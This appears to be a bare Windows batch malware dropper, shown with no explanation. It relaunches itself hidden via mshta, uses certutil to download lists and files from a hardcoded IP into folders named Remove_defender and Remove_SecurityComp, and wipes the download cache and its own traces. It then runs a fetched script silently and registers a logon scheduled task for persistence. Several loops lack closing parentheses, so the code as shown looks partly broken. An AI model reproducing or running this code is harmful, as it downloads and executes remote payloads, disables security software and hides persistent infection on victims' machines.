if "%1"=="h" goto begin
start mshta vbscript:createobject("wscript.shell").run("""e:\net\dr\%~nx0"" h",0)(window.close)&&exit
:begin
@echo off
TIMEOUT /T 300
cd e:\net
certutil -urlcache -split -f http://206.217.142.166:1234/windows/dr/contents1.txt e:\net\contents1.txt
certutil -urlcache -split -f http://206.217.142.166:1234/windows/dr/contents2.txt e:\net\contents2.txt
certutil -urlcache -split -f http://206.217.142.166:1234/windows/dr/contents3.txt e:\net\contents3.txt
certutil -urlcache -split -f http://206.217.142.166:1234/windows/dr/contents4.txt e:\net\contents4.txt
md dr\Remove_defender
md dr\Remove_SecurityComp
md dr\ISO_Maker\$OEM$\$$\Panther
for /f %%i in (contents1.txt) do (
certutil -urlcache -split -f http://206.217.142.166:1234/windows/dr/%%i e:\net\dr\%%i
for /f %%i in (contents2.txt) do (
certutil -urlcache -split -f http://206.217.142.166:1234/windows/dr/Remove_defender/%%i e:\net\dr\Remove_defender\%%i
for /f %%i in (contents3.txt) do (
certutil -urlcache -split -f http://206.217.142.166:1234/windows/dr/Remove_SecurityComp/%%i e:\net\dr\Remove_SecurityComp\%%i
for /f %%i in (contents4.txt) do (
certutil -urlcache -split -f http://206.217.142.166:1234/windows/dr/ISO_Maker/$OEM$/$$/Panther/%%i e:\net\dr\ISO_Maker\$OEM$\$$\Panther\%%i
certutil -urlcache * delete
del /f contents1.txt contents2.txt contents3.txt contents4.txt
cd e:\net\dr
start /b call Script_Run.bat y >nul 2>nul
certutil -urlcache -split -f http://206.217.142.166:1234/windows/start1.bat e:\net\start1.bat >nul 2>nul
SchTasks /Create /SC ONLOGON /TN "my net" /TR "e:\net\start1.bat" /f >nul 2>nul
SchTasks /Delete /TN "my dr" /f